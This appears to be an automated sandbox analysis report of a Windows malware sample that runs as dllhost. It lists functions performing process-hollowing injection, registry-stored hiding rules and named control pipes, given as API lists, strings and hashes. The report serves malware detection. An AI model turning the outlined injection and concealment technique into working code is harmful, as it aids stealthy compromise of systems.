                                                                                                                                                          • Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$Open$CloseDeleteFileHandleInformationTokenValue$AllocAuthorityExitHeapLocalName$CountEnumErrorFindFreeLastModulePathProcessesQueryReadWow64lstrlen
                                                                                                                                                          • String ID: $rbx-dll32$$rbx-dll64$$rbx-stager$$rbx-svc32$$rbx-svc64$SOFTWARE$open
                                                                                                                                                          • API String ID: 4225498131-1538754800
                                                                                                                                                          • Opcode ID: 736ca42babcb8c521872a82743edff672a2e6888472d9d1dca7c806dbabe5d2e
                                                                                                                                                          • Instruction ID: 6e35c32a62d70e7d93f4307674840714c013e8363098979e1a8d92760cac109a
                                                                                                                                                          • Opcode Fuzzy Hash: 736ca42babcb8c521872a82743edff672a2e6888472d9d1dca7c806dbabe5d2e
                                                                                                                                                          • Instruction Fuzzy Hash: 00B1EAF1204A8196EB77DF27B8643E923A9F74D7C4F408125BB4A47AB9DF398645C700
                                                                                                                                                          Function 0000000140002434 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 317injectionthreadmemoryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 296 140002434-140002469 297 140002911 296->297 298 14000246f-14000247b 296->298 301 140002913-14000292d 297->301 299 140002493 298->299 300 14000247d-140002487 298->300 303 140002496-140002499 299->303 300->297 302 14000248d-140002491 300->302 302->303 304 1400024d4 303->304 305 14000249b-1400024b6 call 1400020cc 303->305 306 1400024d7-140002532 CreateProcessW 304->306 305->297 322 1400024bc-1400024c7 305->322 308 1400028d7-1400028df 306->308 309 140002538-14000254f 306->309 311 1400028e1-1400028ef OpenProcess 308->311 312 1400028fc-140002903 308->312 313 140002555-14000258f call 1400020cc VirtualAllocEx 309->313 314 140002730-140002767 call 1400020cc VirtualAllocEx 309->314 311->312 315 1400028f1-1400028f6 TerminateProcess 311->315 312->297 317 140002905-14000290c 312->317 313->308 326 140002595-1400025b1 WriteProcessMemory 313->326 314->308 327 14000276d-140002789 WriteProcessMemory 314->327 315->312 317->306 322->297 323 1400024cd 322->323 323->304 326->308 328 1400025b7-1400025dc VirtualProtectEx 326->328 327->308 329 14000278f-1400027b3 VirtualProtectEx 327->329 328->308 331 1400025e2-1400025f0 328->331 329->308 330 1400027b9-1400027c7 329->330 332 140002858-140002877 VirtualAlloc 330->332 333 1400027cd 330->333 334 140002682-1400026a1 VirtualAlloc 331->334 335 1400025f6 331->335 332->308 338 140002879-14000288f Wow64GetThreadContext 332->338 336 1400027d0-1400027f2 WriteProcessMemory 333->336 334->308 337 1400026a7-1400026be GetThreadContext 334->337 339 1400025f9-14000261b WriteProcessMemory 335->339 340 1400028d5 336->340 341 1400027f8-140002803 336->341 337->308 342 1400026c4-1400026e9 WriteProcessMemory 337->342 338->308 343 140002891-1400028b4 WriteProcessMemory 338->343 339->340 344 140002621-14000262c 339->344 340->308 345 140002805-140002809 341->345 346 14000280b 341->346 342->308 347 1400026ef-14000270c SetThreadContext 342->347 343->308 348 1400028b6-1400028ca Wow64SetThreadContext 343->348 349 140002634 344->349 350 14000262e-140002632 344->350 351 14000280f-14000283e call 140002930 VirtualProtectEx 345->351 346->351 347->308 352 140002712-140002720 ResumeThread 347->352 348->340 353 140002638-140002665 call 140002930 VirtualProtectEx 349->353 350->353 351->340 360 140002844-140002852 351->360 352->308 356 140002726-14000272b 352->356 353->340 359 14000266b-14000267c 353->359 356->301 359->334 359->339 360->332 360->336
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$Virtual$MemoryWrite$Thread$AllocContextProtect$Wow64$AddressCreateHandleModuleOpenProcResumeTerminate
                                                                                                                                                          • String ID: @$NtUnmapViewOfSection$RtlGetVersion$h
                                                                                                                                                          • API String ID: 1036100660-1371749706
                                                                                                                                                          • Opcode ID: fd1195e2308bccc300b2ff8f21b2c4cfd69eb2883e391b150e12868519e03b4e
                                                                                                                                                          • Instruction ID: 2cc4599025b35cf826ffc418a6ccceb484f0f008c335a408c33283198f0c2c0b
                                                                                                                                                          • Opcode Fuzzy Hash: fd1195e2308bccc300b2ff8f21b2c4cfd69eb2883e391b150e12868519e03b4e
                                                                                                                                                          • Instruction Fuzzy Hash: DAD15DB6705A8187EB65CF63F84479AB7A0F788BC4F004025EB8A47BA4DF78D595CB04
                                                                                                                                                          Function 0000000140001274 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 136memoryregistrystringCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                                                          • String ID: d
                                                                                                                                                          • API String ID: 2005889112-2564639436
                                                                                                                                                          • Opcode ID: 52c6d37a2af4a1d6a0e24c1d193143f06bb7b356f12ba86b493c37bc12672881
                                                                                                                                                          • Instruction ID: 9172d928bd221ff1096d4d6b158f49becdf828e9a984a0b33df103b3ad9988b4
                                                                                                                                                          • Opcode Fuzzy Hash: 52c6d37a2af4a1d6a0e24c1d193143f06bb7b356f12ba86b493c37bc12672881
                                                                                                                                                          • Instruction Fuzzy Hash: 765138B2604B8086EB16DF62F4483AA77A1F79CBD9F444124EB4A07B78DF38C555C710
                                                                                                                                                          Function 000000014000151C Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValue
                                                                                                                                                          • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                                                          • API String ID: 3993315683-3414887735
                                                                                                                                                          • Opcode ID: ae2cb63a08c00f37da9eb0e616e317ce87cbb245c55dcd9753d322b5e5e56f75
                                                                                                                                                          • Instruction ID: 0bd1eed236b6321b202bdd9012a21668a5814f2879643e8febc2c05628ee43d5
                                                                                                                                                          • Opcode Fuzzy Hash: ae2cb63a08c00f37da9eb0e616e317ce87cbb245c55dcd9753d322b5e5e56f75
                                                                                                                                                          • Instruction Fuzzy Hash: 0171D3B6310A5086EB22EF66F8507D923A4FB88BC8F016125FB4D97A7ADE38C554C744
                                                                                                                                                          Function 0000000140003728 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40sleepfilepipeCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                                                                                                          • String ID: M$\\.\pipe\$rbx-childproc
                                                                                                                                                          • API String ID: 2203880229-2840927681
                                                                                                                                                          • Opcode ID: d0165abbce705caac342610e0fae3c6613993ee0f9e2c254021f88293e17d979
                                                                                                                                                          • Instruction ID: 2fb808d8c0fa1e0908606fb17de5b970416f6dc98e2db846ceffa582aa456b5d
                                                                                                                                                          • Opcode Fuzzy Hash: d0165abbce705caac342610e0fae3c6613993ee0f9e2c254021f88293e17d979
                                                                                                                                                          • Instruction Fuzzy Hash: B91139F1218A8482E726DB23F8043E9A764A78DBE0F444225BB6A436F9DF7CC548C704
                                                                                                                                                          Function 000000014000217C Relevance: 13.6, APIs: 9, Instructions: 100memorycomCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4184240511-0
                                                                                                                                                          • Opcode ID: c322ffdba1650a2f2ae2605316e9b34693b952877218ba9b1551f4330c074e45
                                                                                                                                                          • Instruction ID: e7c2dfd052af18fd3abcefe0f72c8446b9113f84b0d7c840ae7e34f71e75c1d0
                                                                                                                                                          • Opcode Fuzzy Hash: c322ffdba1650a2f2ae2605316e9b34693b952877218ba9b1551f4330c074e45
                                                                                                                                                          • Instruction Fuzzy Hash: FF4146B2704A859AE711CF6AF8443DD63B1FB89B99F445225BF0A43A69DF38C159C304
                                                                                                                                                          Function 000000014000104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 404 14000104c-1400010b9 RegQueryInfoKeyW 405 1400011b5-1400011d0 404->405 406 1400010bf-1400010c9 404->406 406->405 407 1400010cf-14000111f RegEnumValueW 406->407 408 1400011a5-1400011af 407->408 409 140001125-14000112a 407->409 408->405 408->407 409->408 410 14000112c-140001135 409->410 411 140001147-14000114c 410->411 412 140001137 410->412 413 140001199-1400011a3 411->413 414 14000114e-140001193 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 411->414 415 14000113b-14000113f 412->415 413->408 414->413 415->408 416 140001141-140001145 415->416 416->411 416->415
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                                                          • String ID: d
                                                                                                                                                          • API String ID: 3743429067-2564639436
                                                                                                                                                          • Opcode ID: 435c76a4378829ae359b2b91fc268e6eea08dc0b264376e4228dac23cbb25988
                                                                                                                                                          • Instruction ID: 03f89dd543fa71545bde49b2618b44e89e47b203f0d8546e2499baea92addc30
                                                                                                                                                          • Opcode Fuzzy Hash: 435c76a4378829ae359b2b91fc268e6eea08dc0b264376e4228dac23cbb25988
                                                                                                                                                          • Instruction Fuzzy Hash: D1412AB2614B84C6E765CF62F4447DA77A1F388B98F448129EB8907B68DF38C589CB40
                                                                                                                                                          Function 00000001400017A8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 417 1400017a8-1400017e4 RegOpenKeyExW 418 140001841-140001866 RegDeleteKeyExW 417->418 419 1400017e6 417->419 420 1400017f3-140001839 RegEnumKeyExW 419->420 421 1400017e8-1400017ed RegDeleteKeyW 420->421 422 14000183b RegCloseKey 420->422 421->420 422->418
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Delete$CloseEnumOpen
                                                                                                                                                          • String ID: SOFTWARE\$rbx-config
                                                                                                                                                          • API String ID: 3013565938-3990243012
                                                                                                                                                          • Opcode ID: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
                                                                                                                                                          • Instruction ID: 8421849941bfc07d5c6a41991bb422c7bbd6d954f4ecfba192073c561d1589c4
                                                                                                                                                          • Opcode Fuzzy Hash: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
                                                                                                                                                          • Instruction Fuzzy Hash: 301186B2614A8485E761CF26F8447D923B4F78C7D8F405205E75D0BAA9DF7CC258CB19
                                                                                                                                                          Function 0000000140002CB0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36sleeppipefileCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 423 140002cb0-140002cba 424 140002cbd-140002cd0 call 140002300 423->424 427 140002cd2-140002cdb Sleep 424->427 428 140002cdd-140002cea ConnectNamedPipe 424->428 427->424 429 140002d21-140002d26 Sleep 428->429 430 140002cec-140002d0d ReadFile 428->430 431 140002d2c-140002d35 DisconnectNamedPipe 429->431 430->431 432 140002d0f-140002d14 430->432 431->428 432->431 433 140002d16-140002d1f 432->433 433->431
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                                                                                                                          • String ID: \\.\pipe\$rbx-control
                                                                                                                                                          • API String ID: 2071455217-3647231676
                                                                                                                                                          • Opcode ID: 13c250ee6af2f53f1ae13243be044548fb926b5294e6b09330778d5fdc3bad2d
                                                                                                                                                          • Instruction ID: 2fc089305b625fd554036cd80c6cb28bc5e3d827a9ce39b23356f380729c3a5f
                                                                                                                                                          • Opcode Fuzzy Hash: 13c250ee6af2f53f1ae13243be044548fb926b5294e6b09330778d5fdc3bad2d
                                                                                                                                                          • Instruction Fuzzy Hash: 8B011AB1214A0482FB16DB23F8547E9A360A79DBE1F144225FB67436F5DF78C948C704
                                                                                                                                                          Function 0000000140002300 Relevance: 9.1, APIs: 6, Instructions: 82memorypipeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3197395349-0
                                                                                                                                                          • Opcode ID: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                                                                                                                                                          • Instruction ID: 08f0d969cdc459eeaae67e0f3491139f795acf93ec6e34b01acc3ed94c40f622
                                                                                                                                                          • Opcode Fuzzy Hash: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                                                                                                                                                          • Instruction Fuzzy Hash: 173169B2214691CAE761CF25F4807DE77A4F748798F40422AFB4947EA8DB78C259CB44
                                                                                                                                                          Function 0000000140003668 Relevance: 9.1, APIs: 6, Instructions: 58memorysleepCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3676546796-0
                                                                                                                                                          • Opcode ID: 024d52d6f90a11a1aeae588e1dd8838628c4d8da57bc26401303b463d71a9915
                                                                                                                                                          • Instruction ID: a6189abee9d4784d5a048b00fbef5fbb6685315bc6f537058aeec4b09c4bf2e6
                                                                                                                                                          • Opcode Fuzzy Hash: 024d52d6f90a11a1aeae588e1dd8838628c4d8da57bc26401303b463d71a9915
                                                                                                                                                          • Instruction Fuzzy Hash: 2B1190F270461186E72ACB17F85479A7665F7C8BC1F148028EB4607B78CF3AC880CB00
                                                                                                                                                          Function 000000014000148C Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$Process$Free
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3168794593-0
                                                                                                                                                          • Opcode ID: ba5f53336e6612f67f84370bf05ece9e08de79f6dc7f5e86e37cd44739219e00
                                                                                                                                                          • Instruction ID: 5a1011d9486e765d7ba40cc25435cd7167fae03bd1d0927e1cf3db12c06e0eeb
                                                                                                                                                          • Opcode Fuzzy Hash: ba5f53336e6612f67f84370bf05ece9e08de79f6dc7f5e86e37cd44739219e00
                                                                                                                                                          • Instruction Fuzzy Hash: 2A0132B2610A808AE705EF67B80438977A0F78CFC0F4A4525FB5953B39CE38D091C744
                                                                                                                                                          Function 00000001400020CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                          • String ID: ntdll.dll
                                                                                                                                                          • API String ID: 1646373207-2227199552
                                                                                                                                                          • Opcode ID: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
                                                                                                                                                          • Instruction ID: 17fa8e42c722db624f1936625922d1a8ab69534039b48c71a9bb0a293c881c2b
                                                                                                                                                          • Opcode Fuzzy Hash: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
                                                                                                                                                          • Instruction Fuzzy Hash: CAD0C9F8B1260182EF1AEB6778553E152515B6DBC9F4940209F0647772DE38C0E48318
                                                                                                                                                          Function 0000000140001220 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1617791916-0
                                                                                                                                                          • Opcode ID: c7a43bef6df9d8d05703a7189659e0aa7f0603dabacb6fa5d63025371af7a52a
                                                                                                                                                          • Instruction ID: 6e91e1ae57bb2f507bdd30ccb813d710b9eda330d3ff7d449275dd8231ce62c3
                                                                                                                                                          • Opcode Fuzzy Hash: c7a43bef6df9d8d05703a7189659e0aa7f0603dabacb6fa5d63025371af7a52a
                                                                                                                                                          • Instruction Fuzzy Hash: EBE032F1B41A0086E709DB63E80838936E1EB9CB85F898024AA0907371DF7D85D98B90
                                                                                                                                                          Function 0000000140001000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1617791916-0
                                                                                                                                                          • Opcode ID: 63251503df5c7392b59882377b05ff3c407c5ffe99838fad78ad3d93c79eabbc
                                                                                                                                                          • Instruction ID: a4bc93d2c7b124559308cf7a4161fd93bc4ab92d57e3b019964b2e6119ad9c46
                                                                                                                                                          • Opcode Fuzzy Hash: 63251503df5c7392b59882377b05ff3c407c5ffe99838fad78ad3d93c79eabbc
                                                                                                                                                          • Instruction Fuzzy Hash: B7E0EDF1B5150086E709DB63E84439976A1FB9CB55F858024DA1907731DE3885D58654

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 000002ADD6232EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000060.00000003.2329431899.000002ADD6230000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002ADD6230000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_96_3_2add6230000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction ID: 4686274220722fda45750febc74a8211f54cc4b085de23b653408301a5e5dad7
                                                                                                                                                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction Fuzzy Hash: 7891467BB21A9087DB608F25D40876DFB91F705F94F548128DE8A4BB98DF38DA02C741

                                                                                                                                                          Non-executed Functions

